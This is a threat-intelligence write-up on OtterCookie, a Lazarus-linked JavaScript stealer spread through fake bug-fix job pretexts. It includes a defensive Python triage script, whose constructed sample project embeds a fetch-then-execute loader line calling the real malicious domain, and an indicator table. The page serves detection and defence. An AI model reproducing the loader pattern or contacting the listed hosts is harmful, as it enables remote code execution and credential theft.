OtterCookie: Analysis of New Lazarus Group Malware

2025-06-03 Any Run

https://any.run/cybersecurity-blog/ottercookie-malware-analysis/


OtterCookie is described as a Lazarus-linked JavaScript stealer delivered through the Contagious Interview or DevPopper social engineering pattern against tech, financial, and cryptocurrency professionals. In the observed case, a LinkedIn freelance bug-fix pretext led the target to a clean-looking Bitbucket Node.js project that was built to fail on startup; the failing code path fetched and executed code from chainlink-api-v3[.]cloud via a require() call. The malware targets browser credentials, macOS keychains, password-manager and crypto-wallet data including Solana and Exodus, then stages the collected data for exfiltration to 144.172.101.45 on port 1224 at the /uploads path. The payload also attempts to install a portable Python runtime and execute InvisibleFerret, linking the intrusion chain to earlier DPRK malware such as Beavertail and InvisibleFerret. The campaign matters because it shows Lazarus hiding execution inside normal developer troubleshooting workflows rather than relying on obviously malicious dependencies.
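As an added example (not code from the Any.Run report), a small Python triage script a reviewer can run over a "please fix my broken project" hand-over before executing it: it flags require() calls whose argument is not a string literal, URLs and the two network indicators named above hardcoded in source, and an HTTP client feeding an eval-like sink in the same project. The sample project files embedded below are constructed for illustration, not the real OtterCookie loader.

```python
"""Static triage of a Node.js project for the fetch-then-execute loader pattern."""
import re

# Network indicators quoted in the report summary above.
KNOWN_IOCS = ("chainlink-api-v3.cloud", "144.172.101.45")

# Source patterns worth a second look in a project handed over for a "bug fix".
PATTERNS = {
    # require(<expression>) rather than require('<literal>')
    "dynamic_require": re.compile(r"\brequire\(\s*[^'\"\s)]"),
    "url_in_source": re.compile(r"https?://[\w.-]+(?::\d+)?[\w/.-]*"),
    "remote_eval": re.compile(r"\b(eval|new\s+Function|vm\.runInThisContext)\s*\("),
    "http_client": re.compile(r"\b(axios(?:\.\w+)?|fetch|https?\.get|https?\.request)\s*\("),
}


def scan_source(name, text):
    """Return (file, line_no, label, snippet) tuples for one source file."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for ioc in KNOWN_IOCS:
            if ioc in line:
                findings.append((name, no, f"known_ioc:{ioc}", line.strip()))
        for label, rx in PATTERNS.items():
            if rx.search(line):
                findings.append((name, no, label, line.strip()))
    return findings


def triage(project):
    """Scan every file; escalate when an HTTP client/URL and an eval-like sink co-occur."""
    findings = [f for name, text in project.items() for f in scan_source(name, text)]
    labels = {f[2] for f in findings}
    escalate = "remote_eval" in labels and ("http_client" in labels or "url_in_source" in labels)
    return findings, escalate


# Constructed sample project (hypothetical; the startup "bug" is the loader itself).
SAMPLE_PROJECT = {
    "package.json": '{"name": "demo", "main": "index.js", "dependencies": {"axios": "^1.6.0"}}',
    "index.js": (
        "const axios = require('axios');\n"
        "const loader = require(process.env.LOADER || './loader');\n"
        "async function main() {\n"
        "  const r = await axios.get('http://chainlink-api-v3.cloud/a');\n"
        "  new Function(r.data)();  // runs whatever the server returned\n"
        "}\n"
        "main();\n"
    ),
    "config.js": "module.exports = { port: 3000 };\n",
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_PROJECT)[0]:
        print(finding)
```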

Indicators of Compromise

Type Value First Seen Last Seen
DOMAIN chainlink-api-v3.cloud 2025-04-11 2026-02-19
IPv4 144.172.101.45 2025-06-03 2026-02-03
IPv4 135.181.123.177 2025-04-11 2025-10-16
HASH 56e15ef3b5e5f169fc063f8d3e88288e 2025-04-11 2025-07-30
URL http://chainlink-api-v3.cloud/a… 2025-04-11 2025-07-30
HASH ec234419fc512baded05f7b29fefbf1… 2025-04-11 2025-06-03
HASH aa0d64c39680027d56a32ffd4ceb787… 2025-04-11 2025-06-03
HASH 071aff6941dc388516d8ca0215b757f… 2025-04-11 2025-06-03
HASH 486f305bdd09a3ef6636e92c6a9e016… 2025-04-11 2025-06-03
URL http://chainlink-api-v3.cloud/a… 2025-04-11 2025-06-03
